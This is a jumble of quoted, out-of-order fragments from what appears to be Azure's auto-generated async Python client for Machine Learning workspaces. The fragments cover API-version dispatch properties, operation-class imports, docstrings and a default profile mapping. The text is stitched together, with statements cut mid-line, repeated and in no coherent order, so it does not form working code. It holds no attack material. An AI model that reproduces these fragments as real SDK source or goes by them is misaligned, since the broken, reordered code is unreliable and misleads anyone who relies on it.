ValueError(\"API version {} does not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client,", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise ValueError(\"API", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends on the API version:", "'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on the", "'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on the", "= self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else:", "== 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise ValueError(\"API version {}", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on the API version: * v1.0:", "..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "@property def environment_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` *", "models elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview import models return models elif api_version", "api_version == '2022-05-01': from 
..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version", "2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "'2022-01-01-preview': from ..v2022_01_01_preview import models return models elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview", "= self._get_api_version('usages') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on the API version: *", "BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass", "'2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on the", "from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass else: raise ValueError(\"API version {} does not", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'async_operations'\".format(api_version))", "does not have operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "import EnvironmentVersionsOperations as OperationClass elif 
api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as", "'2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version == '2021-10-01':", "raise ValueError(\"API version {} does not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config,", "__init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None, base_url: str =", "* 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\"", "from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass else: raise ValueError(\"API version {} does not", "..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import 
BatchDeploymentsOperations", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version", "* 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\"", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise ValueError(\"API", "def extensive_model(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version", "..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations", "not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self):", "version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version == '1.0.0': from", "api_version = self._get_api_version('jobs') if api_version == '2021-10-01': from 
..v2021_10_01.aio.operations import JobsOperations as OperationClass", "-------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles", "v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview:", "the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version ==", "\"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint')", "..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations", "depends on the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if", "= self._get_api_version('data_container') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else:", "Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: 
:class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>`", "'2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'private_endpoint_connections'\".format(api_version))", "== '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise ValueError(\"API version {}", "group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on", "EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass", "api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass", "from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise ValueError(\"API version {} does not", "from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise ValueError(\"API version {} does not", "registry_management_non_workspace(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version =", "the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = 
self._get_api_version('batch_job_deployment') if api_version ==", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise ValueError(\"API version", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_container'\".format(api_version)) return", "'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1':", "DataCallOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass else: raise ValueError(\"API version", "@property def workspaces(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` *", "api_version = self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass", "..v2021_10_01.aio.operations import Operations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations", "OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass else: raise", "Retry-After header is present. 
\"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE =", "\"\"\"Instance depends on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run')", "* 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version ==", "have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version", "'1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0',", "'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass else: raise ValueError(\"API version {} does", "rights reserved. # Licensed under the MIT License. 
See License.txt in the project", "import ComponentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version ==", "import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "connect to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the target", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on the API version:", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` *", "operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends", "'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends on the", "have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance", "api_version == '2021-10-01': from 
..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview':", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_deployments'\".format(api_version))", "..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations", "api_version = self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass", "'2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does", ":mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>`", "if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API", "== '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise ValueError(\"API version {}", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise ValueError(\"API", "depends on the API version: * 2021-10-01: 
:class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview:", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on the API version:", "no profile is provided, or if missing in profile. :type api_version: str :param", "== '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version {}", "* v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations", "Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends on the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>`", ":class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01': from", "raise ValueError(\"API version {} does not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config,", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else: raise ValueError(\"API version", 
"self._get_api_version('jobs') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif api_version", "group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on", "'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG", "ValueError(\"API version {} does not have operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs # type: Any ) ->", "from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise ValueError(\"API version {} does not", "== '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", ":class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations", "== 'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass else: raise ValueError(\"API version {}", "..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations", "'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass else: raise ValueError(\"API version {} does", "operation group 'batch_job_endpoint'\".format(api_version)) return 
OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends", "OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass", "'2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0',", "ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview',", ":class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version", "import ExperimentsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "from ..v2020_09_01_dataplanepreview import models return models elif api_version == '2021-10-01': from ..v2021_10_01 import", "\"\"\" api_version = self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "azure.core.credentials import TokenCredential from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs):", "models return 
models elif api_version == 'v1.0': from ..registry_discovery import models return models", "depends on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else:", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as OperationClass elif api_version", "..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations", "for the client to connect to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The", "from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise ValueError(\"API version {} does not", "\"\"\" api_version = self._get_api_version('quotas') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as", "\"\"\" api_version = self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as", "version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from", "have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await", "2022-05-01: 
:class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif", "the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\"", "* 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version ==", "return models elif api_version == '2022-05-01': from ..v2022_05_01 import models return models raise", "self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None, base_url: str = \"https://management.azure.com\",", "data_call(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version =", "def data_version(self): \"\"\"Instance depends on the API version: * 1.5.0: 
:class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version", "'2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version {} does", "import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as", "the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if api_version ==", "\"\"\"Instance depends on the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric')", "ValueError(\"API version {} does not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on the", "* 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` *", "import Operations as OperationClass else: raise ValueError(\"API version {} does not have operation", "the 
API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version ==", "version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version =", "CodeVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass", "'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on the", "= self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif", "extensive_model(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version =", "= self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif", "2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from ..dataset_dataplane import models return models", "2022-05-01: 
:class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential", "group and its API version. The api-version parameter sets the default API version", "'2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise ValueError(\"API version {} does", "have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance", "from ..runhistory.aio.operations import SpansOperations as OperationClass else: raise ValueError(\"API version {} does not", "'2022-05-01': from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does", "{} does not have operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self): \"\"\"Instance depends on the API", "profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time between two polls for LRO", "as OperationClass else: raise ValueError(\"API version {} 
does not have operation group 'spans'\".format(api_version))", "final version of multiapi azure-core based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These", "not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self):", "ValueError(\"API version {} does not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", ":class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations", "* 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: 